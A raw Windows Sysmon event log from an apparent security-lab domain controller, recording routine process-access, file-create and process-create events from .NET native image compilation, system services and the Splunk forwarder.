13:49:47.510{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.495{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b60-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-18 13:49:47.495 10341000x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.417{59A5CD1D-91FB-6005-5303-00000000A301}10043768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.354{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.338{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.338{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.307{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.292{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.292{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.276{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e28-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-18 13:49:47.276 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.198{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.182{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.182{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 